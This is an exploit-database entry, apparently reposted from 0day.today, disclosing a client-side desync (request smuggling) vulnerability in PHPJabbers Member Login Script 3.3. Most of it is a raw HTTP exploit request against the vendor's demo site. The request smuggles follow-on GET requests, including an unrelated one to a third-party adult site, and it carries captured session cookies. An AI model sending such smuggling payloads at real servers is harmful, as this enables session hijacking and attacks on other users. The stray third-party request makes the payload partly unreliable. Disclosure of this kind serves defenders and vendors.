Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
zdtNu11secur1ty1337DAY-ID-39028
HistorySep 04, 2023 - 12:00 a.m.

Member Login Script 3.3 - Client-side desync Vulnerability

2023-09-0400:00:00
nu11secur1ty
0day.today
91
client-side desync
vulnerability
post request
content-length header
exploit
phpjabbers
request smuggling
web security
proof and exploit
JSON
## Title: Member Login Script 3.3 - Client-side desync
## Author: nu11secur1ty
## Vendor: https://www.phpjabbers.com/
## Reference: https://portswigger.net/web-security/request-smuggling/browser/client-side-desync

## Description:
The server appears to be vulnerable to client-side desync attacks. A
POST request was sent to the path '/1692959852_473/index.php' with a
second request sent as the body. The server ignored the Content-Length
header and did not close the connection, leading to the smuggled
request being interpreted as the next request.

STATUS: HIGH Vulnerability

[+]Exploit:
```
POST /1692959852_473/index.php?controller=pjFront&action=pjActionLoadCss
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0
Cookie: _ga=GA1.2.2069938240.1692907228;
_gid=GA1.2.1275975650.1692907228; _gat=1;
_fbp=fb.1.1692907228280.366290059;
_ga_NME5VTTGTT=GS1.2.1692957291.2.1.1692957719.60.0.0;
YellowPages=slk3eokcgmdf0r3t7c020quv35;
pjd=g0i8fch5jkebraaaf2812afvb5; pjd_1692957219_259=1
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 1190
Content-Type: application/x-www-form-urlencoded

GET /robots.txt HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Connection: keep-alive
Cache-Control: max-age=0

GET /robots.txt HTTP/2
Host: www.pornhub.com
Cookie: platform=pc; ss=405039333413129808;
fg_0d2ec4cbd943df07ec161982a603817e=60256.100000;
fg_9951ce1ac4434b4ac312a1334fa77d82=6902.100000
Cache-Control: max-age=0
Sec-Ch-Ua:
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Full-Version: ""
Sec-Ch-Ua-Arch: ""
Sec-Ch-Ua-Platform: ""
Sec-Ch-Ua-Platform-Version: ""
Sec-Ch-Ua-Model: ""
Sec-Ch-Ua-Full-Version-List:
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.97
Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9

```

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Member-Login-Script-3.3)

## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/08/member-login-script-33-client-side.html)

## Time spend:
00:35:00
JSON